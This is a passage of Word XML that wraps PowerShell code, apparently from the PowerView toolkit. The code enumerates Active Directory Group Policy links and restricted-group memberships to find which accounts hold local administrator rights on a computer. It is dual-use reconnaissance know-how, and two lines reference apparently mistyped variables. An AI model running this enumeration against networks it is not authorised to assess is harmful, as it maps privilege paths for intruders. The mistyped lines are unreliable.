        <w:t xml:space="preserve">                } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358EDCD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GPOGroupArgs =  @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BAE106" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        'Domain' = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50577081" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        'DomainController' = $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583F016" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        'ResolveMemberSIDs' = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719E530E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        'UsePSDrive' = $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E542D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        'PageSize' = $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3341E43C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD9922" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D485DD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # for each GPO link, get any locally set user/group SIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C447BDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Get-NetGPOGroup @GPOGroupArgs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50A2B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027EAFEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512FFD86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391DE323" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9F7DF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetOUs = @($OUName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF8AA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066E50F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="666E59B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Target OUs: $TargetOUs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274EFEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B24B874" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetOUs | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC508D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53F00920" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GPOLinks = Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $_ -FullData -PageSize $PageSize | ForEach-Object { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9AEA3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # and then get any GPO links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419094A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($_.gplink) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8641A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $_.gplink.split("][") | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C90D751" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if ($_.startswith("LDAP")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA114BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $_.split(";")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA5A075" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76095D7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053FB44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB59EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A15234D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27F80AC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            $GPOGroupArgs =  @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C24AE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Domain' = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C0A596" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'DomainController' = $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9D3659" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'UsePSDrive' = $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3AB96A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'ResolveMemberSIDs' = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8037C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'PageSize' = $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA55B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116DA4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54C14B7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # extract GPO groups that are set through any gPlink for this OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16799E87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GPOGroups += Get-NetGPOGroup @GPOGroupArgs | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C369A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach($GPOLink in $GPOLinks) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB8DF85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Name = $_.GPOName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2863BF78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($GPOLink -like "*$Name*") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B52361" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611B1056" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664E93BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8704CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CFA3A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC54735" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34498F6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # for each found GPO group, resolve the SIDs of the members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051013E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOgroups | Sort-Object -Property GPOName -Unique | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D84D73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GPOGroup = $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09200807" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2CE0A074" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($GPOGroup.GroupMembers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4078468D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOMembers = $GPOGroup.GroupMembers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613762D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D7C738" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05028584" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOMembers = $GPOGroup.GroupSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC8C815" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0B122" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E884796" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GPOMembers | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2EFDFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # resolve this SID to a domain object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED2AB1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Object = Get-ADObject -Domain $Domain -DomainController $DomainController -PageSize $PageSize -SID $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FAD644" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BFAD607" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F1B6E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04021555" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF922E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC4379" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $Object.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7526BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5BF9D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BF356" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $IsGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4703025C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E4E46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8DBEE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E08359" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1BBD5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOComputerAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C2598" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A7B3ABE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if we're recursing and the current result object is a group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4489750C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Recurse -and $GPOComputerAdmin.isGroup) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685C2805" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32783FC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Get-NetGroupMember -Domain $Domain -DomainController $DomainController -SID $_ -FullData -Recurse -PageSize $PageSize | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3387B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35EA49D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MemberDN = $_.distinguishedName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781F1564" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B849330" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        # extract the FQDN from the Distinguished Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F8E01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C76F9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1911BD2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5892DA02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14C27232" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if ($_.samAccountName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A3981F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # forest users have the samAccountName set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F9A54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $MemberName = $_.samAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A063C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1220C348" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0498C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # external trust users have a SID, so convert it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56422FAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442B6240" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $MemberName = Convert-SidToName $_.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6514C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA1257" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFE98D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                # if there's a problem contacting the domain to resolve the SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539D55B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $MemberName = $_.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BAE3D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC2A802" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B441D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="264E011D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198D77A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6332F08B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $MemberName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3442DFE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $MemberDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0494B834" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_.objectsid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B4C1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $MemberIsGrou</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753578A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435217A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F626FA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6261E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOTypep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5223D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GPOComputerAdmin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D360243" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C01BAA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79626B50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBC350" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7140B996" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CB46A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
